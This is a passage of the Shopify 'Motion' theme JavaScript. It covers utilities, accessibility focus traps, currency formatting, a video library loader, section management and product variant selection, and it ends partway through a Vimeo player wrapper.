/*
@license
  Motion by Archetype Themes (https://archetypethemes.co)
  Access unminified JS in assets/theme.js

  Use this event listener to run your own JS outside of this file.
  Documentation - https://archetypethemes.co/blogs/motion/javascript-events-for-developers

  document.addEventListener('page:loaded', function() {
    // Page has loaded and theme assets are ready
  });
*/

window.theme = window.theme || {};
window.Shopify = window.Shopify || {};

theme.config = {
  bpSmall: false,
  bpSmallValue: 589,
  hasSessionStorage: true,
  mediaQuerySmall: 'screen and (max-width: 589px)',
  youTubeReady: false,
  vimeoReady: false,
  vimeoLoading: false,
  isTouch: ('ontouchstart' in window) || window.DocumentTouch && window.document instanceof DocumentTouch || window.navigator.maxTouchPoints || window.navigator.msMaxTouchPoints ? true : false,
  rtl: document.documentElement.getAttribute('dir') == 'rtl' ? true : false
};

if (theme.config.isTouch) {
  document.documentElement.className += ' supports-touch';
}

if (console && console.log) {
  console.log('Motion theme ('+theme.settings.themeVersion+') by ARCHΞTYPE | Learn more at https://archetypethemes.co');
}

(function(){
  'use strict';

  theme.delegate = {
    on: function(event, callback, options){
      if( !this.namespaces ) // save the namespaces on the DOM element itself
        this.namespaces = {};
  
      this.namespaces[event] = callback;
      options = options || false;
  
      this.addEventListener(event.split('.')[0], callback, options);
      return this;
    },
    off: function(event) {
      if (!this.namespaces) { return }
      this.removeEventListener(event.split('.')[0], this.namespaces[event]);
      delete this.namespaces[event];
      return this;
    }
  };
  
  // Extend the DOM with these above custom methods
  window.on = Element.prototype.on = theme.delegate.on;
  window.off = Element.prototype.off = theme.delegate.off;
  
  theme.utils = {
    defaultTo: function(value, defaultValue) {
      return (value == null || value !== value) ? defaultValue : value
    },
  
    wrap: function(el, wrapper) {
      el.parentNode.insertBefore(wrapper, el);
      wrapper.appendChild(el);
    },
  
    debounce: function(wait, callback, immediate) {
      var timeout;
      return function() {
        var context = this, args = arguments;
        var later = function() {
          timeout = null;
          if (!immediate) callback.apply(context, args);
        };
        var callNow = immediate && !timeout;
        clearTimeout(timeout);
        timeout = setTimeout(later, wait);
        if (callNow) callback.apply(context, args);
      }
    },
  
    throttle: function(limit, callback) {
      var waiting = false;
      return function () {
        if (!waiting) {
          callback.apply(this, arguments);
          waiting = true;
          setTimeout(function () {
            waiting = false;
          }, limit);
        }
      }
    },
  
    prepareTransition: function(el, callback) {
      el.addEventListener('transitionend', removeClass);

      function removeClass(evt) {
        el.classList.remove('is-transitioning');
        el.removeEventListener('transitionend', removeClass);
      }

      el.classList.add('is-transitioning');
      el.offsetWidth; // check offsetWidth to force the style rendering

      if (typeof callback === 'function') {
        callback();
      }
    },

    /** Drawer transitions: without forced layout (INP). Only the drawer’s transform transition may clear
        `is-transitioning` — inner .appear-animation transitionend bubbles would otherwise fire first and break stagger + slide timing. */
    prepareDrawerTransition: function(el, callback) {
      var done = false;

      function cleanup() {
        if (done) {
          return;
        }
        done = true;
        window.clearTimeout(fallbackTimer);
        el.removeEventListener('transitionend', onDrawerTransitionEnd);
        el.classList.remove('is-transitioning');
      }

      function onDrawerTransitionEnd(evt) {
        if (!evt || evt.target !== el) {
          return;
        }
        var prop = evt.propertyName || '';
        if (prop.indexOf('transform') === -1) {
          return;
        }
        cleanup();
      }

      el.addEventListener('transitionend', onDrawerTransitionEnd);
      var fallbackTimer = window.setTimeout(cleanup, 650);

      el.classList.add('is-transitioning');
      if (typeof callback === 'function') {
        callback();
      }
    },
  
    // _.compact from lodash
    // Creates an array with all falsey values removed. The values `false`, `null`,
    // `0`, `""`, `undefined`, and `NaN` are falsey.
    // _.compact([0, 1, false, 2, '', 3]);
    // => [1, 2, 3]
    compact: function(array) {
      var index = -1,
          length = array == null ? 0 : array.length,
          resIndex = 0,
          result = [];
  
      while (++index < length) {
        var value = array[index];
        if (value) {
          result[resIndex++] = value;
        }
      }
      return result;
    },
  
    serialize: function(form) {
      var arr = [];
      Array.prototype.slice.call(form.elements).forEach(function(field) {
        if (
          !field.name ||
          field.disabled ||
          ['file', 'reset', 'submit', 'button'].indexOf(field.type) > -1
        )
          return;
        if (field.type === 'select-multiple') {
          Array.prototype.slice.call(field.options).forEach(function(option) {
            if (!option.selected) return;
            arr.push(
              encodeURIComponent(field.name) +
                '=' +
                encodeURIComponent(option.value)
            );
          });
          return;
        }
        if (['checkbox', 'radio'].indexOf(field.type) > -1 && !field.checked)
          return;
        arr.push(
          encodeURIComponent(field.name) + '=' + encodeURIComponent(field.value)
        );
      });
      return arr.join('&');
    }
  };

  /** One drawer focus trap; avoids scanning hundreds of nav nodes during open (INP). */
  var drawerLazyTrapState = null;

  theme.a11y = {
    trapFocusDrawerLazy: function(options) {
      var container = options.container;
      if (!container) {
        return;
      }

      theme.a11y.releaseTrapFocusDrawerLazy();

      function visibleFocusables() {
        var nodes = container.querySelectorAll(
          'button:not([disabled]), a[href], input:not([disabled]), select:not([disabled]), textarea:not([disabled]), [tabindex]:not([tabindex="-1"])'
        );
        var list = [];
        for (var i = 0; i < nodes.length; i++) {
          var n = nodes[i];
          if (n.offsetParent !== null || (n.getClientRects && n.getClientRects().length > 0)) {
            list.push(n);
          }
        }
        return list;
      }

      function onKeyDown(evt) {
        if (evt.key !== 'Tab' && evt.keyCode !== 9) {
          return;
        }
        var list = visibleFocusables();
        if (list.length === 0) {
          return;
        }
        var first = list[0];
        var last = list[list.length - 1];
        var active = document.activeElement;
        if (!evt.shiftKey && active === last) {
          evt.preventDefault();
          first.focus({ preventScroll: true });
        } else if (evt.shiftKey && active === first) {
          evt.preventDefault();
          last.focus({ preventScroll: true });
        }
      }

      function onFocusIn(evt) {
        if (!drawerLazyTrapState || drawerLazyTrapState.container !== container) {
          return;
        }
        if (container.contains(evt.target)) {
          return;
        }
        var list = visibleFocusables();
        if (!list.length) {
          return;
        }
        requestAnimationFrame(function() {
          if (!container.contains(document.activeElement)) {
            list[0].focus({ preventScroll: true });
          }
        });
      }

      drawerLazyTrapState = {
        container: container,
        onKeyDown: onKeyDown,
        onFocusIn: onFocusIn
      };

      document.addEventListener('keydown', onKeyDown, true);
      document.addEventListener('focusin', onFocusIn, true);

      var focusTarget =
        options.elementToFocus ||
        container.querySelector('#CartDrawerForm') ||
        container.querySelector('.drawer__close-button');
      requestAnimationFrame(function() {
        if (focusTarget && typeof focusTarget.focus === 'function') {
          focusTarget.focus({ preventScroll: true });
        }
      });
    },

    releaseTrapFocusDrawerLazy: function() {
      if (!drawerLazyTrapState) {
        return;
      }
      document.removeEventListener('keydown', drawerLazyTrapState.onKeyDown, true);
      document.removeEventListener('focusin', drawerLazyTrapState.onFocusIn, true);
      drawerLazyTrapState = null;
    },

    trapFocus: function(options) {
      var eventsName = {
        focusin: options.namespace ? 'focusin.' + options.namespace : 'focusin',
        focusout: options.namespace
          ? 'focusout.' + options.namespace
          : 'focusout',
        keydown: options.namespace
          ? 'keydown.' + options.namespace
          : 'keydown.handleFocus'
      };
  
      // Get every possible visible focusable element
      var focusableEls = options.container.querySelectorAll('button, [href], input, select, textarea, [tabindex]:not([tabindex^="-"])');
      var elArray = [].slice.call(focusableEls);
      var focusableElements = elArray.filter(el => el.offsetParent !== null);
  
      var firstFocusable = focusableElements[0];
      var lastFocusable = focusableElements[focusableElements.length - 1];
  
      if (!options.elementToFocus) {
        options.elementToFocus = options.container;
      }
  
      options.container.setAttribute('tabindex', '-1');
      options.elementToFocus.focus();
  
      document.documentElement.off('focusin');
      document.documentElement.on(eventsName.focusout, function() {
        document.documentElement.off(eventsName.keydown);
      });
  
      document.documentElement.on(eventsName.focusin, function(evt) {
        if (evt.target !== options.container && evt.target !== lastFocusable && evt.target !== firstFocusable) return;
  
        document.documentElement.on(eventsName.keydown, function(evt) {
          _manageFocus(evt);
        });
      });
  
      function _manageFocus(evt) {
        if (evt.keyCode !== 9) return;
        /**
         * On the first focusable element and tab backward,
         * focus the last element
         */
        if (evt.target === lastFocusable && !evt.shiftKey) {
          evt.preventDefault();
          firstFocusable.focus();
        }
      }
    },
    removeTrapFocus: function(options) {
      var eventName = options.namespace
        ? 'focusin.' + options.namespace
        : 'focusin';
  
      if (options.container) {
        options.container.removeAttribute('tabindex');
      }
  
      document.documentElement.off(eventName);
    },
  
    lockMobileScrolling: function(namespace, element) {
      var el = element ? element : document.documentElement;
      document.documentElement.classList.add('lock-scroll');
      el.on('touchmove' + namespace, function() {
        return true;
      });
    },
  
    unlockMobileScrolling: function(namespace, element) {
      document.documentElement.classList.remove('lock-scroll');
      var el = element ? element : document.documentElement;
      el.off('touchmove' + namespace);
    }
  };
  
  // Add class when tab key starts being used to show outlines
  document.documentElement.on('keyup.tab', function(evt) {
    if (evt.keyCode === 9) {
      document.documentElement.classList.add('tab-outline');
      document.documentElement.off('keyup.tab');
    }
  });
  
  const trapFocusHandlers = {};
  
  /**
   * Currency Helpers
   * -----------------------------------------------------------------------------
   * A collection of useful functions that help with currency formatting
   *
   * Current contents
   * - formatMoney - Takes an amount in cents and returns it as a formatted dollar value.
   *   - When theme.settings.superScriptPrice is enabled, format cents in <sup> tag
   * - getBaseUnit - Splits unit price apart to get value + unit
   *
   */
  
  theme.Currency = (function() {
    var moneyFormat = '${{amount}}';
    var superScript = theme && theme.settings && theme.settings.superScriptPrice;
  
    function formatMoney(cents, format) {
      if (!format) {
        format = theme.settings.moneyFormat;
      }
  
      if (typeof cents === 'string') {
        cents = cents.replace('.', '');
      }
      var value = '';
      var placeholderRegex = /\{\{\s*(\w+)\s*\}\}/;
      var formatString = (format || moneyFormat);
  
      function formatWithDelimiters(number, precision, thousands, decimal) {
        precision = theme.utils.defaultTo(precision, 2);
        thousands = theme.utils.defaultTo(thousands, ',');
        decimal = theme.utils.defaultTo(decimal, '.');
  
        if (isNaN(number) || number == null) {
          return 0;
        }
  
        number = (number / 100.0).toFixed(precision);
  
        var parts = number.split('.');
        var dollarsAmount = parts[0].replace(/(\d)(?=(\d\d\d)+(?!\d))/g, '$1' + thousands);
        var centsAmount = parts[1] ? (decimal + parts[1]) : '';
  
        return dollarsAmount + centsAmount;
      }
  
      switch (formatString.match(placeholderRegex)[1]) {
        case 'amount':
          value = formatWithDelimiters(cents, 2);
  
          if (superScript && value && value.includes('.')) {
            value = value.replace('.', '<sup>') + '</sup>';
          }
  
          break;
        case 'amount_no_decimals':
          value = formatWithDelimiters(cents, 0);
          break;
        case 'amount_with_comma_separator':
          value = formatWithDelimiters(cents, 2, '.', ',');
  
          if (superScript && value && value.includes(',')) {
            value = value.replace(',', '<sup>') + '</sup>';
          }
  
          break;
        case 'amount_no_decimals_with_comma_separator':
          value = formatWithDelimiters(cents, 0, '.', ',');
          break;
        case 'amount_no_decimals_with_space_separator':
          value = formatWithDelimiters(cents, 0, ' ');
          break;
      }
  
      return formatString.replace(placeholderRegex, value);
    }
  
    function getBaseUnit(variant) {
      if (!variant) {
        return;
      }
  
      if (!variant.unit_price_measurement || !variant.unit_price_measurement.reference_value) {
        return;
      }
  
      return variant.unit_price_measurement.reference_value === 1
        ? variant.unit_price_measurement.reference_unit
        : variant.unit_price_measurement.reference_value +
            variant.unit_price_measurement.reference_unit;
    }
  
    return {
      formatMoney: formatMoney,
      getBaseUnit: getBaseUnit
    }
  })();
  
  theme.Images = (function() {
  
    /**
     * Find the Shopify image attribute size
     */
    function imageSize(src) {
      if (!src) {
        return '620x'; // default based on theme
      }
  
      var match = src.match(/.+_((?:pico|icon|thumb|small|compact|medium|large|grande)|\d{1,4}x\d{0,4}|x\d{1,4})[_\.@]/);
  
      if (match !== null) {
        return match[1];
      } else {
        return null;
      }
    }
  
    /**
     * Adds a Shopify size attribute to a URL
     */
    function getSizedImageUrl(src, size) {
      if (!src) {
        return src;
      }
  
      if (size == null) {
        return src;
      }
  
      if (size === 'master') {
        return this.removeProtocol(src);
      }
  
      var match = src.match(/\.(jpg|jpeg|gif|png|bmp|bitmap|tiff|tif)(\?v=\d+)?$/i);
  
      if (match != null) {
        var prefix = src.split(match[0]);
        var suffix = match[0];
  
        return this.removeProtocol(prefix[0] + '_' + size + suffix);
      }
  
      return null;
    }
  
    function removeProtocol(path) {
      return path.replace(/http(s)?:/, '');
    }
  
    function buildImagePath(string, widths) {
  
      if (string == null) return [];
  
      if (widths) {
        const imageUrls = [];
  
        widths.forEach(width => {
          let url = `${string}?width=${width}`;
          if (width === widths[widths.length - 1]) {
            url += ` ${width}w`
          } else {
            url += ` ${width}w,`
          }
          imageUrls.push(url);
        })
        return imageUrls;
      } else {
        return [string];
      }
    }
  
    return {
      imageSize: imageSize,
      getSizedImageUrl: getSizedImageUrl,
      removeProtocol: removeProtocol,
      buildImagePath: buildImagePath
    };
  })();
  
  // Init section function when it's visible, then disable observer
  theme.initWhenVisible = function (options) {
    var threshold = options.threshold ? options.threshold : 0
  
    var observer = new IntersectionObserver((entries, observer) => {
      entries.forEach(entry => {
        if (entry.isIntersecting) {
          if (typeof options.callback === 'function') {
            options.callback()
            observer.unobserve(entry.target)
          }
        }
      })
    }, { rootMargin: '0px 0px ' + threshold + 'px 0px' })
  
    observer.observe(options.element)
  }
  
  theme.LibraryLoader = (function() {
    var types = {
      link: 'link',
      script: 'script'
    };
  
    var status = {
      requested: 'requested',
      loaded: 'loaded'
    };
  
    var cloudCdn = 'https://cdn.shopify.com/shopifycloud/';
  
    var libraries = {
      youtubeSdk: {
        tagId: 'youtube-sdk',
        src: 'https://www.youtube.com/iframe_api',
        type: types.script
      },
      vimeo: {
        tagId: 'vimeo-api',
        src: 'https://player.vimeo.com/api/player.js',
        type: types.script
      },
      shopifyXr: {
        tagId: 'shopify-model-viewer-xr',
        src: cloudCdn + 'shopify-xr-js/assets/v1.0/shopify-xr.en.js',
        type: types.script
      },
      modelViewerUi: {
        tagId: 'shopify-model-viewer-ui',
        src: cloudCdn + 'model-viewer-ui/assets/v1.0/model-viewer-ui.en.js',
        type: types.script
      },
      modelViewerUiStyles: {
        tagId: 'shopify-model-viewer-ui-styles',
        src: cloudCdn + 'model-viewer-ui/assets/v1.0/model-viewer-ui.css',
        type: types.link
      }
    };
  
    function load(libraryName, callback) {
      var library = libraries[libraryName];
  
      if (!library) return;
      if (library.status === status.requested) return;
  
      callback = callback || function() {};
      if (library.status === status.loaded) {
        callback();
        return;
      }
  
      library.status = status.requested;
  
      var tag;
  
      switch (library.type) {
        case types.script:
          tag = createScriptTag(library, callback);
          break;
        case types.link:
          tag = createLinkTag(library, callback);
          break;
      }
  
      tag.id = library.tagId;
      library.element = tag;
  
      var firstScriptTag = document.getElementsByTagName(library.type)[0];
      firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);
    }
  
    function createScriptTag(library, callback) {
      var tag = document.createElement('script');
      tag.src = library.src;
      tag.addEventListener('load', function() {
        library.status = status.loaded;
        callback();
      });
      return tag;
    }
  
    function createLinkTag(library, callback) {
      var tag = document.createElement('link');
      tag.href = library.src;
      tag.rel = 'stylesheet';
      tag.type = 'text/css';
      tag.addEventListener('load', function() {
        library.status = status.loaded;
        callback();
      });
      return tag;
    }
  
    return {
      load: load
    };
  })();
  
  theme.rteInit = function() {
    // Wrap tables so they become scrollable on small screens
    document.querySelectorAll('.rte table').forEach(table => {
      var wrapWith = document.createElement('div');
      wrapWith.classList.add('table-wrapper');
      theme.utils.wrap(table, wrapWith);
    });
  
    // Wrap video iframe embeds so they are responsive
    document.querySelectorAll('.rte iframe[src*="youtube.com/embed"]').forEach(iframe => {
      wrapVideo(iframe);
    });
    document.querySelectorAll('.rte iframe[src*="player.vimeo"]').forEach(iframe => {
      wrapVideo(iframe);
    });
  
    function wrapVideo(iframe) {
      // Reset the src attribute on each iframe after page load
      // for Chrome's "incorrect iFrame content on 'back'" bug.
      // https://code.google.com/p/chromium/issues/detail?id=395791
      iframe.src = iframe.src;
      var wrapWith = document.createElement('div');
      wrapWith.classList.add('video-wrapper');
      theme.utils.wrap(iframe, wrapWith);
    }
  
    // Remove CSS that adds animated underline under image links
    document.querySelectorAll('.rte a img').forEach(img => {
      img.parentNode.classList.add('rte__image');
    });
  }
  
  theme.Sections = function Sections() {
    this.constructors = {};
    this.instances = [];
  
    document.addEventListener('shopify:section:load', this._onSectionLoad.bind(this));
    document.addEventListener('shopify:section:unload', this._onSectionUnload.bind(this));
    document.addEventListener('shopify:section:select', this._onSelect.bind(this));
    document.addEventListener('shopify:section:deselect', this._onDeselect.bind(this));
    document.addEventListener('shopify:block:select', this._onBlockSelect.bind(this));
    document.addEventListener('shopify:block:deselect', this._onBlockDeselect.bind(this));
  };
  
  theme.Sections.prototype = Object.assign({}, theme.Sections.prototype, {
    _createInstance: function(container, constructor, scope) {
      var id = container.getAttribute('data-section-id');
      var type = container.getAttribute('data-section-type');
  
      constructor = constructor || this.constructors[type];
  
      if (typeof constructor === 'undefined') {
        return;
      }
  
      // If custom scope passed, check to see if instance
      // is already initialized so we don't double up
      if (scope) {
        var instanceExists = this._findInstance(id);
        if (instanceExists) {
          this._removeInstance(id);
        }
      }
  
      // If a section fails to init, handle the error without letting all subsequest section registers to fail
      try {
        var instance = Object.assign(new constructor(container), {
          id: id,
          type: type,
          container: container
        });
        this.instances.push(instance);
      } catch (e) {
        console.error(e);
      }
    },
  
    _findInstance: function(id) {
      for (var i = 0; i < this.instances.length; i++) {
        if (this.instances[i].id === id) {
          return this.instances[i];
        }
      }
    },
  
    _removeInstance: function(id) {
      var i = this.instances.length;
      var instance;
  
      while(i--) {
        if (this.instances[i].id === id) {
          instance = this.instances[i];
          this.instances.splice(i, 1);
          break;
        }
      }
  
      return instance;
    },
  
    _onSectionLoad: function(evt, subSection, subSectionId) {
      if (window.AOS) { AOS.refreshHard() }
      if (theme && theme.initGlobals) {
        theme.initGlobals();
      }
  
      var container = subSection ? subSection : evt.target;
      var section = subSection ? subSection : evt.target.querySelector('[data-section-id]');
  
      if (!section) {
        return;
      }
  
      this._createInstance(section);
  
      var instance = subSection ? subSectionId : this._findInstance(evt.detail.sectionId);
  
      // Check if we have subsections to load
      var haveSubSections = container.querySelectorAll('[data-subsection]');
      if (haveSubSections.length) {
        this.loadSubSections(container);
      }
  
      // Run JS only in case of the section being selected in the editor
      // before merchant clicks "Add"
      if (instance && typeof instance.onLoad === 'function') {
        instance.onLoad(evt);
      }
  
      // Force editor to trigger scroll event when loading a section
      setTimeout(function() {
        window.dispatchEvent(new Event('scroll'));
      }, 200);
    },
  
    _onSectionUnload: function(evt) {
      this.instances = this.instances.filter(function(instance) {
        var isEventInstance = instance.id === evt.detail.sectionId;
  
        if (isEventInstance) {
          if (typeof instance.onUnload === 'function') {
            instance.onUnload(evt);
          }
        }
  
        return !isEventInstance;
      });
    },
  
    loadSubSections: function(scope) {
      if (!scope) {
        return;
      }
  
      var sections = scope.querySelectorAll('[data-section-id]');
  
      sections.forEach(el => {
        this._onSectionLoad(null, el, el.dataset.sectionId);
      });
    },
  
    _onSelect: function(evt) {
      var instance = this._findInstance(evt.detail.sectionId);
  
      if (
        typeof instance !== 'undefined' &&
        typeof instance.onSelect === 'function'
      ) {
        instance.onSelect(evt);
      }
    },
  
    _onDeselect: function(evt) {
      var instance = this._findInstance(evt.detail.sectionId);
  
      if (
        typeof instance !== 'undefined' &&
        typeof instance.onDeselect === 'function'
      ) {
        instance.onDeselect(evt);
      }
    },
  
    _onBlockSelect: function(evt) {
      var instance = this._findInstance(evt.detail.sectionId);
  
      if (
        typeof instance !== 'undefined' &&
        typeof instance.onBlockSelect === 'function'
      ) {
        instance.onBlockSelect(evt);
      }
    },
  
    _onBlockDeselect: function(evt) {
      var instance = this._findInstance(evt.detail.sectionId);
  
      if (
        typeof instance !== 'undefined' &&
        typeof instance.onBlockDeselect === 'function'
      ) {
        instance.onBlockDeselect(evt);
      }
    },
  
    register: function(type, constructor, scope) {
      this.constructors[type] = constructor;
  
      var sections = document.querySelectorAll('[data-section-type="' + type + '"]');
  
      if (scope) {
        sections = scope.querySelectorAll('[data-section-type="' + type + '"]');
      }
  
      sections.forEach(
        function(container) {
          this._createInstance(container, constructor, scope);
        }.bind(this)
      );
    },
  
    reinit: function(section) {
      for (var i = 0; i < this.instances.length; i++) {
        var instance = this.instances[i];
        if (instance['type'] === section) {
          if (typeof instance.forceReload === 'function') {
            instance.forceReload();
          }
        }
      }
    }
  });
  
  /*
    Options:
      container
      enableHistoryState - enable when on single product page to update URL
      singleOptionSelector - selector for individual variant option (e.g. 'Blue' or 'Small')
      originalSelectorId - selector for base variant selector (visually hidden)
      variants - JSON parsed object of product variant info
   */
  theme.Variants = (function() {
  
    function Variants(options) {
      this.container = options.container;
      this.variants = options.variants;
      this.singleOptionSelector = options.singleOptionSelector;
      this.originalSelectorId = options.originalSelectorId;
      this.enableHistoryState = options.enableHistoryState;
      this.dynamicVariantsEnabled = options.dynamicVariantsEnabled;
      this.currentlySelectedValues = this._getCurrentOptions();
      this.currentVariant = this._getVariantFromOptions();
  
      this.container.querySelectorAll(this.singleOptionSelector).forEach(el => {
        el.addEventListener('change', this._onSelectChange.bind(this));
      });
    }
  
    Variants.prototype = Object.assign({}, Variants.prototype, {
  
      _getCurrentOptions: function() {
        var result = [];
  
        this.container.querySelectorAll(this.singleOptionSelector).forEach(el => {
          var type = el.getAttribute('type');
  
          if (type === 'radio' || type === 'checkbox') {
            if (el.checked) {
              result.push({
                value: el.value,
                index: el.dataset.index
              });
            }
          } else {
            result.push({
              value: el.value,
              index: el.dataset.index
            });
          }
        });
  
        // remove any unchecked input values if using radio buttons or checkboxes
        result = theme.utils.compact(result);
  
        return result;
      },
  
      // Pull the number out of the option index name, e.g. 'option1' -> 1
      _numberFromOptionKey: function(key) {
        return parseInt(key.substr(-1));
      },
  
      // Options should be ordered from highest to lowest priority. Make sure that priority
      // is represented using weighted values when finding best match
      _getWeightedOptionMatchCount: function(variant) {
        return this._getCurrentOptions().reduce((count, {value, index}) => {
          const optionIndex = this._numberFromOptionKey(index);
          const weightedCount = 4 - optionIndex; // The lower the index, the better the match we have
          return variant[index] === value ? count + weightedCount : count;
        },0)
      },
  
      _getFullMatch(needsToBeAvailable) {
        const currentlySelectedOptions = this._getCurrentOptions();
        const variants = this.variants;
  
        return variants.find(variant => {
          const isMatch = currentlySelectedOptions.every(({value, index}) => {
            return variant[index] === value;
          });
  
          if (needsToBeAvailable) {
            return isMatch && variant.available;
          } else {
            return isMatch;
          }
        });
      },
  
      // Find a variant that is available and best matches last selected option
      _getClosestAvailableMatch: function(lastSelectedOption) {
        if (!lastSelectedOption) return null;
  
        const currentlySelectedOptions = this._getCurrentOptions();
        const variants = this.variants;
  
        const potentialAvailableMatches = lastSelectedOption && variants.filter(variant => {
          return currentlySelectedOptions
            .filter(
              // Only match based selected options that are equal and preceeding the last selected option
              ({value, index}) => this._numberFromOptionKey(index) <= this._numberFromOptionKey(lastSelectedOption.index)
            ).every(({value, index}) => {
              // Variant needs to have options that match the current and preceeding selection options
              return variant[index] === value;
            }) && variant.available
        });
  
        return potentialAvailableMatches.reduce((bestMatch, variant) => {
          // If this is the first potential match we've found, store it as the best match
          if (bestMatch === null) return variant;
  
          // If this is not the first potential match, compare the number of options our current best match has in common
          // compared to the next contender.
          const bestMatchCount = this._getWeightedOptionMatchCount(bestMatch, lastSelectedOption);
          const newCount = this._getWeightedOptionMatchCount(variant, lastSelectedOption);
  
          return newCount > bestMatchCount ? variant : bestMatch;
        }, null);
      },
  
      _getVariantFromOptions: function(lastSelectedOption) {
        const availableFullMatch = this._getFullMatch(true);
        const closestAvailableMatch = this._getClosestAvailableMatch(lastSelectedOption);
        const fullMatch = this._getFullMatch(false);
  
        if (this.dynamicVariantsEnabled) {
          // Add some additional smarts to variant matching if Dynamic Variants are enabled
          return availableFullMatch || closestAvailableMatch || fullMatch || null;
        } else {
          // Only return a full match or null (variant doesn't exist) if Dynamic Variants are disabled
          return fullMatch || null;
        }
  
      },
  
      _updateInputState: function (variant, el) {
        return (input) => {
          if (variant === null) return;
  
          const index = input.dataset.index;
          const value = input.value;
          const type = input.getAttribute('type');
  
          if (type === 'radio' || type === 'checkbox') {
            input.checked = variant[index] === value
          } else {
            input.value = variant[index];
          }
        }
      },
  
      _onSelectChange: function({srcElement}) {
        const optionSelectElements = this.container.querySelectorAll(this.singleOptionSelector);
  
        // Get the best variant based on the current selection + last selected element
        const variant = this._getVariantFromOptions({
          index: srcElement.dataset.index,
          value: srcElement.value
        });
  
        // Update DOM option input states based on the variant that was found
        optionSelectElements.forEach(this._updateInputState(variant, srcElement))
  
        // Make sure our currently selected values are up to date after updating state of DOM
        const currentlySelectedValues = this.currentlySelectedValues = this._getCurrentOptions();
  
        const detail = {
          variant,
          currentlySelectedValues,
          value: srcElement.value,
          index: srcElement.parentElement.dataset.index
        }
  
        this.container.dispatchEvent(new CustomEvent('variantChange', {detail}));
        document.dispatchEvent(new CustomEvent('variant:change', {detail}));
  
        if (!variant) {
          return;
        }
  
        this._updateMasterSelect(variant);
        this._updateImages(variant);
        this._updatePrice(variant);
        this._updateUnitPrice(variant);
        this._updateSKU(variant);
        this.currentVariant = variant;

        // replaceState itself is cheap, but scripts hooked into URL changes (analytics/tag
        // managers) made it cost ~150ms right here. Nothing visible depends on the URL, so
        // it is debounced and applied a moment later: only the final variant of a quick
        // series of changes updates it.
        if (this.enableHistoryState) {
          clearTimeout(this._historyTimer);
          this._historyTimer = setTimeout(() => {
            this._updateHistoryState(variant);
          }, 300);
        }
      },
  
      _updateImages: function(variant) {
        var variantImage = variant.featured_image || {};
        var currentVariantImage = this.currentVariant && this.currentVariant.featured_image || {};
  
        if (!variant.featured_image || variantImage.src === currentVariantImage.src) {
          return;
        }
  
        this.container.dispatchEvent(new CustomEvent('variantImageChange', {
          detail: {
            variant: variant
          }
        }));
      },
  
      _updatePrice: function(variant) {
        if (this.currentVariant && variant.price === this.currentVariant.price && variant.compare_at_price === this.currentVariant.compare_at_price) {
          return;
        }
  
        this.container.dispatchEvent(new CustomEvent('variantPriceChange', {
          detail: {
            variant: variant
          }
        }));
      },
  
      _updateUnitPrice: function(variant) {
        if (this.currentVariant && variant.unit_price === this.currentVariant.unit_price) {
          return;
        }
  
        this.container.dispatchEvent(new CustomEvent('variantUnitPriceChange', {
          detail: {
            variant: variant
          }
        }));
      },
  
      _updateSKU: function(variant) {
        if (this.currentVariant && variant.sku === this.currentVariant.sku) {
          return;
        }
  
        this.container.dispatchEvent(new CustomEvent('variantSKUChange', {
          detail: {
            variant: variant
          }
        }));
      },
  
      _updateHistoryState: function(variant) {
        if (!history.replaceState || !variant) {
          return;
        }
  
        var newurl = window.location.protocol + '//' + window.location.host + window.location.pathname + '?variant=' + variant.id;
        window.history.replaceState({path: newurl}, '', newurl);
      },
  
      _updateMasterSelect: function(variant) {
        let masterSelect = this.container.querySelector(this.originalSelectorId);
        if (!masterSelect) return;

        masterSelect.value = variant.id;

        // Force a change event so Shop Pay installments works after a variant is changed.
        // The listeners behind it cost ~100ms and nothing visible depends on them, so the
        // event is dispatched after the browser has painted the selection; a newer change
        // supersedes a pending one.
        const token = this._masterSelectToken = (this._masterSelectToken || 0) + 1;
        requestAnimationFrame(() => {
          setTimeout(() => {
            if (token !== this._masterSelectToken) return;

            masterSelect.dispatchEvent(new Event('change', { bubbles: true }));
          }, 0);
        });
      }
    });
  
    return Variants;
  })();
  
  window.vimeoApiReady = function () {
    theme.config.vimeoLoading = true
  
    // Because there's no way to check for the Vimeo API being loaded
    // asynchronously, we use this terrible timeout to wait for it being ready
    checkIfVimeoIsReady()
      .then(function () {
        theme.config.vimeoReady = true
        theme.config.vimeoLoading = false
        document.dispatchEvent(new CustomEvent('vimeoReady'))
      })
  }
  
  function checkIfVimeoIsReady () {
    let wait
    let timeout
  
    return new Promise((resolve, reject) => {
      wait = setInterval(function () {
        if (!Vimeo) {
          return
        }
  
        clearInterval(wait)
        clearTimeout(timeout)
        resolve()
      }, 500)
  
      timeout = setTimeout(function () {
        clearInterval(wait)
        reject()
      }, 4000) // subjective. test up to 8 times over 4 seconds
    })
  }
  
  theme.VimeoPlayer = (function () {
    const classes = {
      loading: 'loading',
      loaded: 'loaded',
      interactable: 'video-interactable'
    }
  
    const defaults = {
      byline: false,
      loop: true,
      muted: true,
      playsinline: true,
      portrait: false,
      title: false
    }
  
    function VimeoPlayer (divId, videoId, options) {
      this.divId = divId
      this.el = document.getElementById(divId)
      this.videoId = videoId
      this.iframe = null
      this.options = options
  
      if (this.options && this.options.videoParent) {
        this.parent = this.el.closest(this.options.videoParent)
      }
  
      this.setAsLoading()
  
      if (theme.config.vimeoReady) {
        this.init()
      } else {
        theme.LibraryLoader.load('vimeo', window.vimeoApiReady)
        document.addEventListener('vimeoReady', this.init.bind(this))
      }
    }
  
    VimeoPlayer.prototype = Object.assign({}, VimeoPlayer.prototype, {
      init: function () {
        const args = defaults
        args.id = this.videoId
  
        this.videoPlayer = new Vimeo.Player(this.el, args)
  
        this.videoPlayer.ready().then(this.playerReady.bind(this))
      },
  
      playerReady: function () {
        this.iframe = this.el.querySelector('iframe')
        this.iframe.setAttribute('tabindex', '-1')
  
        if (this.options.loop === 'false') {
          this.videoPlayer.setLoop(false)
        }
  
        // When sound is enabled in section settings,
        // for some mobile browsers Vimeo video playback
        // will stop immediately after starting and
        // will require users to tap the play button once more
        if (this.options.style === 'sound') {
          this.videoPlayer.setVolume(1)
        } else {
          this.videoPlayer.setVolume(0)
        }
  
        this.setAsLoaded()
  
        // pause when out of view
        const observer = new IntersectionObserver((entries, observer) => {
          entries.forEach(entry => {
            if (entry.isIntersecting) {
              this.play()
            } else {
              this.pause()
            }
          })
        }, { rootMargin: '0px 0px 50px 0px' })
  
        observer.observe(this.iframe)
      },
  
      setAsLoading: function () {
        if (!this.parent) return
        this.parent.classList.add(classes.loading)
      },
  
      setAsLoaded: function () {
        if (!this.parent) return
        this.parent.classList.remove(classes.loading)
